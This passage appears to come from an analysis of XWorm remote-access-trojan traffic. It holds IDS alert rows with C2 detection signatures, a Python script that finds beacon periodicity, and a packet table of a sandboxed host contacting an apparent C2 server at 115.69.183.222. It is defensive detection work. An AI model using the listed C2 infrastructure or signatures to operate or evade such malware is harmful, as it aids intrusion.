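2024-12-10T10:05:26.204070+0100|2855924|ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound|1|192.168.2.4|49751|115.69.183.222|37593|TCP
2024-12-10T10:05:26.288740+0100|2852873|ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2|1|192.168.2.4|49797|115.69.183.222|37593|TCP
2024-12-10T10:05:26.288740+0100|2852923|ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)|1|192.168.2.4|49797|115.69.183.222|37593|TCP
2024-12-10T10:05:26.527682+0100|2852873|ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2|1|192.168.2.4|49797|115.69.183.222|37593|TCP
2024-12-10T10:05:26.527682+0100|2852923|ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)|1|192.168.2.4|49797|115.69.183.222|37593|TCP
2024-12-10T10:05:26.647074+0100|2852873|ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2|1|192.168.2.4|49797|115.69.183.222|37593|TCP
2024-12-10T10:05:26.647074+0100|2852923|ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)|1|192.168.2.4|49797|115.69.183.222|37593|TCP
2024-12-10T10:05:26.747572+0100|2852870|ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes|1|115.69.183.222|37593|192.168.2.4|49751|TCP
2024-12-10T10:05:26.758670+0100|2852923|ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)|1|192.168.2.4|49751|115.69.183.222|37593|TCP
2024-12-10T10:05:26.876964+0100|2852873|ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2|1|192.168.2.4|49797|115.69.183.222|37593|TCP
2024-12-10T10:05:26.876964+0100|2852923|ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)|1|192.168.2.4|49797|115.69.183.222|37593|TCP
"""


def parse_alerts(text):
    """Split delimited alert rows into dicts; %z accepts the report's '+0100' offset."""
    alerts = []
    for line in text.strip().splitlines():
        ts, sid, sig, sev, sip, sport, dip, dport, proto = line.split("|")
        alerts.append({
            "time": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z"),
            "sid": int(sid), "signature": sig, "severity": int(sev),
            "src": (sip, int(sport)), "dst": (dip, int(dport)), "proto": proto,
        })
    return alerts


def flow_of(alert, local_ip=LOCAL_IP):
    """Return ((local port, remote ip, remote port), direction), 'out' meaning local -> remote."""
    (sip, sport), (dip, dport) = alert["src"], alert["dst"]
    if sip == local_ip:
        return (sport, dip, dport), "out"
    return (dport, sip, sport), "in"


def summarize_flows(alerts, local_ip=LOCAL_IP):
    """Per flow: alert count per SID, number of server-to-client hits, first and last alert time."""
    flows = defaultdict(lambda: {"sids": Counter(), "inbound": 0, "first": None, "last": None})
    for a in sorted(alerts, key=lambda a: a["time"]):
        key, direction = flow_of(a, local_ip)
        f = flows[key]
        f["sids"][a["sid"]] += 1
        f["inbound"] += direction == "in"
        f["first"] = f["first"] or a["time"]
        f["last"] = a["time"]
    return dict(flows)


def cadence(times, bin_s=BIN_S, tolerance=TOLERANCE):
    """Dominant inter-alert period and the share of gaps that are a whole multiple of it.

    Accepting multiples (2x, 3x ...) rather than only the period itself keeps a
    missed beat, which shows up as one gap of twice the period, from breaking the pattern.
    """
    times = sorted(times)
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    if not gaps:
        return None, 0.0
    bins = Counter(round(g / bin_s) for g in gaps)
    top_bin = bins.most_common(1)[0][0]
    period = median(g for g in gaps if round(g / bin_s) == top_bin)
    if period <= 0:
        return period, 0.0
    fits = sum(1 for g in gaps
               if round(g / period) >= 1 and abs(g / period - round(g / period)) <= tolerance)
    return period, fits / len(gaps)


def heartbeat_candidates(alerts, local_ip=LOCAL_IP, min_alerts=MIN_ALERTS):
    """Outbound (local -> remote) signatures whose alerts recur on a fixed period, most regular first."""
    by_flow_sid = defaultdict(list)
    for a in alerts:
        key, direction = flow_of(a, local_ip)
        if direction == "out":
            by_flow_sid[(key, a["sid"])].append(a["time"])
    found = []
    for (key, sid), times in by_flow_sid.items():
        if len(times) < min_alerts:
            continue
        period, regularity = cadence(times)
        found.append({"flow": key, "sid": sid, "alerts": len(times),
                      "period_s": round(period, 4), "regularity": round(regularity, 2)})
    return sorted(found, key=lambda r: -r["regularity"])


if __name__ == "__main__":
    parsed = parse_alerts(ALERT_ROWS)
    for key, info in summarize_flows(parsed).items():
        print(key, dict(info["sids"]), "inbound alerts:", info["inbound"])
    for cand in heartbeat_candidates(parsed):
        print(cand)
```

On these fourteen rows the 49797 flow carries SIDs 2852923 and 2852873 only, the 49751 flow is the one with the inbound 2852870 hit, and both outbound signatures on 49797 come back with a period of about 0.119 s and full regularity even though two of the gaps are double that (the alert for the intervening packet is absent from the table). The same functions run over the complete table; the embedded subset only keeps the example short.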
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 10, 2024 10:03:59.502701044 CET | 49730 | 80 | 192.168.2.4 | 208.95.112.1
Dec 10, 2024 10:03:59.622215033 CET | 80 | 49730 | 208.95.112.1 | 192.168.2.4
Dec 10, 2024 10:03:59.622303963 CET | 49730 | 80 | 192.168.2.4 | 208.95.112.1
Dec 10, 2024 10:03:59.623087883 CET | 49730 | 80 | 192.168.2.4 | 208.95.112.1
Dec 10, 2024 10:03:59.742539883 CET | 80 | 49730 | 208.95.112.1 | 192.168.2.4
Dec 10, 2024 10:04:00.782250881 CET | 80 | 49730 | 208.95.112.1 | 192.168.2.4
Dec 10, 2024 10:04:00.828752995 CET | 49730 | 80 | 192.168.2.4 | 208.95.112.1
Dec 10, 2024 10:04:52.726892948 CET | 80 | 49730 | 208.95.112.1 | 192.168.2.4
Dec 10, 2024 10:04:52.727813959 CET | 49730 | 80 | 192.168.2.4 | 208.95.112.1
Dec 10, 2024 10:04:57.066165924 CET | 49739 | 443 | 192.168.2.4 | 104.20.3.235
Dec 10, 2024 10:04:57.066205978 CET | 443 | 49739 | 104.20.3.235 | 192.168.2.4
Dec 10, 2024 10:04:57.066271067 CET | 49739 | 443 | 192.168.2.4 | 104.20.3.235
Dec 10, 2024 10:04:57.075794935 CET | 49739 | 443 | 192.168.2.4 | 104.20.3.235
Dec 10, 2024 10:04:57.075807095 CET | 443 | 49739 | 104.20.3.235 | 192.168.2.4
Dec 10, 2024 10:04:58.292967081 CET | 443 | 49739 | 104.20.3.235 | 192.168.2.4
Dec 10, 2024 10:04:58.293086052 CET | 49739 | 443 | 192.168.2.4 | 104.20.3.235
Dec 10, 2024 10:04:58.307934046 CET | 49739 | 443 | 192.168.2.4 | 104.20.3.235
Dec 10, 2024 10:04:58.307954073 CET | 443 | 49739 | 104.20.3.235 | 192.168.2.4
Dec 10, 2024 10:04:58.308222055 CET | 443 | 49739 | 104.20.3.235 | 192.168.2.4
Dec 10, 2024 10:04:58.360033035 CET | 49739 | 443 | 192.168.2.4 | 104.20.3.235
Dec 10, 2024 10:04:58.405805111 CET | 49739 | 443 | 192.168.2.4 | 104.20.3.235
Dec 10, 2024 10:04:58.451325893 CET | 443 | 49739 | 104.20.3.235 | 192.168.2.4
Dec 10, 2024 10:04:59.103619099 CET | 443 | 49739 | 104.20.3.235 | 192.168.2.4
Dec 10, 2024 10:04:59.103718042 CET | 443 | 49739 | 104.20.3.235 | 192.168.2.4
Dec 10, 2024 10:04:59.103923082 CET | 49739 | 443 | 192.168.2.4 | 104.20.3.235
Dec 10, 2024 10:04:59.110546112 CET | 49739 | 443 | 192.168.2.4 | 104.20.3.235
Dec 10, 2024 10:04:59.247281075 CET | 49730 | 80 | 192.168.2.4 | 208.95.112.1
Dec 10, 2024 10:04:59.366570950 CET | 80 | 49730 | 208.95.112.1 | 192.168.2.4
Dec 10, 2024 10:04:59.391567945 CET | 49745 | 443 | 192.168.2.4 | 149.154.167.220
Dec 10, 2024 10:04:59.391617060 CET | 443 | 49745 | 149.154.167.220 | 192.168.2.4
Dec 10, 2024 10:04:59.391906977 CET | 49745 | 443 | 192.168.2.4 | 149.154.167.220
Dec 10, 2024 10:04:59.392225027 CET | 49745 | 443 | 192.168.2.4 | 149.154.167.220
Dec 10, 2024 10:04:59.392241955 CET | 443 | 49745 | 149.154.167.220 | 192.168.2.4
Dec 10, 2024 10:05:00.764673948 CET | 443 | 49745 | 149.154.167.220 | 192.168.2.4
Dec 10, 2024 10:05:00.764769077 CET | 49745 | 443 | 192.168.2.4 | 149.154.167.220
Dec 10, 2024 10:05:00.766663074 CET | 49745 | 443 | 192.168.2.4 | 149.154.167.220
Dec 10, 2024 10:05:00.766673088 CET | 443 | 49745 | 149.154.167.220 | 192.168.2.4
Dec 10, 2024 10:05:00.766931057 CET | 443 | 49745 | 149.154.167.220 | 192.168.2.4
Dec 10, 2024 10:05:00.768362999 CET | 49745 | 443 | 192.168.2.4 | 149.154.167.220
Dec 10, 2024 10:05:00.815337896 CET | 443 | 49745 | 149.154.167.220 | 192.168.2.4
Dec 10, 2024 10:05:01.393793106 CET | 443 | 49745 | 149.154.167.220 | 192.168.2.4
Dec 10, 2024 10:05:01.393867970 CET | 443 | 49745 | 149.154.167.220 | 192.168.2.4
Dec 10, 2024 10:05:01.393949986 CET | 49745 | 443 | 192.168.2.4 | 149.154.167.220
Dec 10, 2024 10:05:01.397095919 CET | 49745 | 443 | 192.168.2.4 | 149.154.167.220
Dec 10, 2024 10:05:01.525624037 CET | 49751 | 37593 | 192.168.2.4 | 115.69.183.222
Dec 10, 2024 10:05:01.644989014 CET | 37593 | 49751 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:01.645080090 CET | 49751 | 37593 | 192.168.2.4 | 115.69.183.222
Dec 10, 2024 10:05:01.678503036 CET | 49751 | 37593 | 192.168.2.4 | 115.69.183.222
Dec 10, 2024 10:05:01.797866106 CET | 37593 | 49751 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:13.940135956 CET | 49751 | 37593 | 192.168.2.4 | 115.69.183.222
Dec 10, 2024 10:05:14.059464931 CET | 37593 | 49751 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:14.455517054 CET | 37593 | 49751 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:14.479696035 CET | 49751 | 37593 | 192.168.2.4 | 115.69.183.222
Dec 10, 2024 10:05:14.599076033 CET | 37593 | 49751 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:19.227536917 CET | 37593 | 49751 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:19.229984045 CET | 49751 | 37593 | 192.168.2.4 | 115.69.183.222
Dec 10, 2024 10:05:19.350052118 CET | 37593 | 49751 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:19.909744978 CET | 37593 | 49751 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:19.909771919 CET | 37593 | 49751 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:19.909782887 CET | 37593 | 49751 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:19.909806013 CET | 37593 | 49751 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:19.909815073 CET | 37593 | 49751 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:19.909830093 CET | 37593 | 49751 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:19.909841061 CET | 37593 | 49751 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:19.909847021 CET | 49751 | 37593 | 192.168.2.4 | 115.69.183.222
Dec 10, 2024 10:05:19.909885883 CET | 49751 | 37593 | 192.168.2.4 | 115.69.183.222
Dec 10, 2024 10:05:19.910018921 CET | 37593 | 49751 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:19.910038948 CET | 49751 | 37593 | 192.168.2.4 | 115.69.183.222
Dec 10, 2024 10:05:19.910121918 CET | 49751 | 37593 | 192.168.2.4 | 115.69.183.222
Dec 10, 2024 10:05:19.918282986 CET | 37593 | 49751 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:19.918520927 CET | 37593 | 49751 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:19.918586969 CET | 49751 | 37593 | 192.168.2.4 | 115.69.183.222
Dec 10, 2024 10:05:19.926767111 CET | 37593 | 49751 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:19.969405890 CET | 49751 | 37593 | 192.168.2.4 | 115.69.183.222
Dec 10, 2024 10:05:20.102238894 CET | 37593 | 49751 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:20.102252960 CET | 37593 | 49751 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:20.102319002 CET | 49751 | 37593 | 192.168.2.4 | 115.69.183.222
Dec 10, 2024 10:05:20.147571087 CET | 49797 | 37593 | 192.168.2.4 | 115.69.183.222
Dec 10, 2024 10:05:20.266871929 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:20.267005920 CET | 49797 | 37593 | 192.168.2.4 | 115.69.183.222
Dec 10, 2024 10:05:20.269109964 CET | 49797 | 37593 | 192.168.2.4 | 115.69.183.222
Dec 10, 2024 10:05:20.388293028 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:20.388437986 CET | 49797 | 37593 | 192.168.2.4 | 115.69.183.222
Dec 10, 2024 10:05:20.507976055 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:20.508838892 CET | 49797 | 37593 | 192.168.2.4 | 115.69.183.222
Dec 10, 2024 10:05:20.629189014 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:20.629374027 CET | 49797 | 37593 | 192.168.2.4 | 115.69.183.222
Dec 10, 2024 10:05:20.748754978 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:20.748806000 CET | 49797 | 37593 | 192.168.2.4 | 115.69.183.222
Dec 10, 2024 10:05:20.868148088 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:20.868343115 CET | 49797 | 37593 | 192.168.2.4 | 115.69.183.222
Dec 10, 2024 10:05:20.988327026 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:20.988429070 CET | 49797 | 37593 | 192.168.2.4 | 115.69.183.222
Dec 10, 2024 10:05:21.108072042 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:21.109746933 CET | 49797 | 37593 | 192.168.2.4 | 115.69.183.222
Dec 10, 2024 10:05:21.229079962 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:21.229754925 CET | 49797 | 37593 | 192.168.2.4 | 115.69.183.222
Dec 10, 2024 10:05:21.349042892 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:21.349750996 CET | 49797 | 37593 | 192.168.2.4 | 115.69.183.222
Dec 10, 2024 10:05:21.469055891 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:21.469249964 CET | 49797 | 37593 | 192.168.2.4 | 115.69.183.222
Dec 10, 2024 10:05:21.588655949 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:21.588748932 CET | 49797 | 37593 | 192.168.2.4 | 115.69.183.222
Dec 10, 2024 10:05:21.708129883 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:21.709749937 CET | 49797 | 37593 | 192.168.2.4 | 115.69.183.222
Dec 10, 2024 10:05:21.829145908 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:21.829229116 CET | 49797 | 37593 | 192.168.2.4 | 115.69.183.222
Dec 10, 2024 10:05:21.917784929 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:21.917850018 CET | 49797 | 37593 | 192.168.2.4 | 115.69.183.222
Dec 10, 2024 10:05:21.948771000 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:22.028538942 CET | 49797 | 37593 | 192.168.2.4 | 115.69.183.222
Dec 10, 2024 10:05:22.037168026 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:22.148083925 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:22.148168087 CET | 49797 | 37593 | 192.168.2.4 | 115.69.183.222
Dec 10, 2024 10:05:22.148175001 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:22.148302078 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:22.148339033 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:22.148431063 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:22.268975019 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:22.269031048 CET | 49797 | 37593 | 192.168.2.4 | 115.69.183.222
Dec 10, 2024 10:05:22.388403893 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:22.388499022 CET | 49797 | 37593 | 192.168.2.4 | 115.69.183.222
Dec 10, 2024 10:05:22.507941961 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:22.507997036 CET | 49797 | 37593 | 192.168.2.4 | 115.69.183.222
Dec 10, 2024 10:05:22.617818117 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:22.617873907 CET | 49797 | 37593 | 192.168.2.4 | 115.69.183.222
Dec 10, 2024 10:05:22.627391100 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:22.646011114 CET | 49797 | 37593 | 192.168.2.4 | 115.69.183.222
Dec 10, 2024 10:05:22.746433973 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:22.746511936 CET | 49797 | 37593 | 192.168.2.4 | 115.69.183.222
Dec 10, 2024 10:05:22.765590906 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:22.765666962 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:22.765712023 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:22.765877962 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:22.765887976 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:22.865884066 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:22.865936041 CET | 49797 | 37593 | 192.168.2.4 | 115.69.183.222
Dec 10, 2024 10:05:22.882124901 CET | 37593 | 49751 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:22.922540903 CET | 49751 | 37593 | 192.168.2.4 | 115.69.183.222
Dec 10, 2024 10:05:22.985328913 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:22.985380888 CET | 49797 | 37593 | 192.168.2.4 | 115.69.183.222
Dec 10, 2024 10:05:23.105046034 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:23.105359077 CET | 49797 | 37593 | 192.168.2.4 | 115.69.183.222
Dec 10, 2024 10:05:23.208024979 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:23.208331108 CET | 49797 | 37593 | 192.168.2.4 | 115.69.183.222
Dec 10, 2024 10:05:23.225627899 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:23.238542080 CET | 49797 | 37593 | 192.168.2.4 | 115.69.183.222
Dec 10, 2024 10:05:23.328279972 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:23.328594923 CET | 49797 | 37593 | 192.168.2.4 | 115.69.183.222
Dec 10, 2024 10:05:23.358201027 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:23.358370066 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:23.358413935 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:23.447947979 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:23.448019028 CET | 49797 | 37593 | 192.168.2.4 | 115.69.183.222
Dec 10, 2024 10:05:23.567867041 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:23.567924023 CET | 49797 | 37593 | 192.168.2.4 | 115.69.183.222
Dec 10, 2024 10:05:23.687199116 CET | 37593 | 49797 | 115.69.183.222 | 192.168.2.4
Dec 10, 2024 10:05:23.687429905 CET | 49797 | 37593 | 192.168.2.4 | 115.69.183.222
                                                                              Dec 10, 2024 10:05:23.802373886 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:23.802603960 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:23.806757927 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:23.836436987 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:23.921989918 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:23.922163963 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:23.956199884 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:23.956212044 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:24.041611910 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:24.045610905 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:24.165127993 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:24.165328979 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:24.284615040 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:24.284666061 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:24.399358034 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:24.399410963 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:24.404016018 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:24.518837929 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:24.530556917 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:24.540311098 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:24.649883032 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:24.659935951 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:24.659945965 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:24.659984112 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:24.660069942 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:24.660200119 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:24.660273075 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:24.779345989 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:24.779401064 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:24.898885965 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:24.898961067 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:25.018382072 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:25.018450022 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:25.137795925 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:25.137856007 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:25.201508045 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:25.239911079 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:25.257397890 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:25.359719992 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:25.359803915 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:25.359879971 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:25.479237080 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:25.479547977 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:25.599037886 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:25.601845026 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:25.721101999 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:25.721164942 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:25.841933966 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:25.842004061 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:25.929080009 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:25.929310083 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:25.958760023 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:25.961394072 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.049031019 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.049097061 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:26.078579903 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.078593016 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.078602076 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.078610897 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.078641891 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.078649998 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.078690052 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.078699112 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.078707933 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.078718901 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.169260025 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.169325113 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:26.204070091 CET4975137593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:26.288655043 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.288739920 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:26.323357105 CET3759349751115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.408188105 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.408309937 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:26.527579069 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.527682066 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:26.647001028 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.647073984 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:26.688174963 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.735043049 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:26.747571945 CET3759349751115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.757515907 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:26.758670092 CET4975137593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:26.766335011 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.876794100 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.876920938 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.876929998 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.876964092 CET4979737593192.168.2.4115.69.183.222
                                                                              Dec 10, 2024 10:05:26.877010107 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.877093077 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.877101898 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.877214909 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.877223969 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.877233028 CET3759349797115.69.183.222192.168.2.4
                                                                              Dec 10, 2024 10:05:26.877243996 CET3759349797115.69.183.222192.168.2.4
